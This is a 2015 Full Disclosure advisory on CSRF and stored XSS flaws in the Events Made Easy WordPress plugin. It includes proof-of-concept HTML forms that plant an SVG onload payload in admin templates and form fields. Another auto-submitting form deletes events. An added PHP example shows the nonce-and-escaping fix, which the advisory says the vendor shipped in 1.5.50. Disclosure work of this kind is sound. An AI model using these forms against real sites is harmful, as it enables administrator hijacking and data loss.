[FD] Events Made Easy WordPress plugin CSRF + Persistent XSS
- To: fulldisclosure@xxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx
- Subject: [FD] Events Made Easy WordPress plugin CSRF + Persistent XSS
- From: David Sopas <davidsopas@xxxxxxxxx>
- Date: Fri, 16 Oct 2015 09:39:09 +0100
Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting
Original advisory:
https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/
Events Made Easy is a full-featured event management solution for
WordPress. Events Made Easy supports public, private, draft and recurring
events, locations management, RSVP (+ optional approval), Paypal,
2Checkout, FirstData and Google maps. With Events Made Easy you can plan
and publish your event, or let people reserve spaces for your weekly
meetings. You can add events list, calendars and description to your blog
using multiple sidebar widgets or shortcodes; if you are a web designer you
can simply employ the template tags provided by Events Made Easy.
When playing around with this plugin I noticed a couple of vulnerabilities.
In my opinion they are critical because they could cause damage to a
WordPress installation.
All of them are CSRF issues: the vendor forgot to place a security token
(a wp_nonce) on the affected forms, so any cross-site page can submit them
on behalf of a logged-in administrator.
#1 Add template CSRF + Persistent XSS
URL: /wp-admin/admin.php?page=eme-templates
If an authenticated admin clicks the “Add template” button on an HTML page
containing this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-templates"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>
This adds a persistent XSS vector in the template description field. The
payload executes automatically every time the admin visits
admin.php?page=eme-templates.
Possible attack scenario:
1. Malicious user checks that Events Made Easy is installed on a WordPress
installation.
2. Malicious user sends the admin a link to a page that has an auto-submit
form with an XSS vector that hijacks the victim's browser.
3. Victim visits the page and gets hijacked.
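For context on the fix, here is an added example (not the plugin's own code,
and not the vendor's 1.5.50 patch) of how a WordPress admin form like the one
above is normally protected: a nonce tied to the logged-in user is emitted in
the form and verified in the handler, so a form hosted on another site cannot
be submitted on the admin's behalf, and the stored description is escaped on
output so a payload like the `<svg/onload=...>` above is rendered as text
instead of executed. The function names and the `eme_example_templates`
option key are hypothetical; the real plugin stores templates in its own
tables.

```php
<?php
// Added example, not the plugin's code. Function names and the option key
// "eme_example_templates" are hypothetical.

// Form side: emit a nonce field next to the existing hidden inputs. The nonce
// is bound to the current user and session, so a cross-site page cannot know it.
function eme_example_render_add_template_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=eme-templates' ) ); ?>">
        <?php wp_nonce_field( 'eme_add_template', 'eme_add_template_nonce' ); ?>
        <input type="hidden" name="eme_admin_action" value="do_addtemplate" />
        <input type="text" name="description" value="" />
        <textarea name="format"></textarea>
        <?php submit_button( __( 'Add template' ) ); ?>
    </form>
    <?php
}

// Handler side: check capability and nonce before touching any state.
function eme_example_handle_add_template() {
    if ( ! isset( $_POST['eme_admin_action'] ) || 'do_addtemplate' !== $_POST['eme_admin_action'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // check_admin_referer() stops the request with a 403 when the nonce is
    // missing, stale or forged; this is the check the affected forms lacked.
    check_admin_referer( 'eme_add_template', 'eme_add_template_nonce' );

    // Sanitize on input: sanitize_text_field() strips tags such as <svg ...>.
    $description = sanitize_text_field( wp_unslash( $_POST['description'] ?? '' ) );
    $format      = wp_kses_post( wp_unslash( $_POST['format'] ?? '' ) );

    // Hypothetical storage so the example is self-contained.
    $templates   = get_option( 'eme_example_templates', array() );
    $templates[] = array( 'description' => $description, 'format' => $format );
    update_option( 'eme_example_templates', $templates );
}
add_action( 'admin_init', 'eme_example_handle_add_template' );

// Listing side: escape on output so anything that did reach the database is
// displayed literally in the admin page, not interpreted as markup.
function eme_example_list_templates() {
    echo '<ul>';
    foreach ( get_option( 'eme_example_templates', array() ) as $template ) {
        echo '<li>' . esc_html( $template['description'] ) . '</li>';
    }
    echo '</ul>';
}
```

The same three steps (nonce in the form, `check_admin_referer()` in the
handler, `esc_html()` on output) apply unchanged to the form-field page in
#2 and to the cleanup form in #3; for #3 only the nonce matters, since no
user-supplied text is rendered back.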
#2 Add Form Field CSRF + Persistent XSS
URL: /wp-admin/admin.php?page=eme-formfields
If an authenticated admin clicks the “Add field” button on an HTML page
containing this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"
method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>
The attack scenario is the same as for vulnerability #1; the same issue
affects form fields in this plugin.
#3 Remove events older than CSRF
URL: /wp-admin/admin.php?page=eme-cleanup
With this CSRF a malicious user could delete all events older than a
chosen age.
In my proof of concept I used an auto-submit form, which could also be used
for vulnerabilities #1 and #2.
<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"
name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script>
Possible attack scenario:
1. Malicious user checks that Events Made Easy is installed on a WordPress
installation.
2. Malicious user sends the admin a link to the page that has this
auto-submit form.
3. Without the victim noticing, events older than 1 day are removed.
Solution:
The vendor launched a patched version, 1.5.50, within a matter of hours. He
was also kind enough to put my name in the changelog.
*-David Sopas*
*davidsopas.com <https://www.davidsopas.com>*
*@dsopas <https://www.twitter.com/dsopas>*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/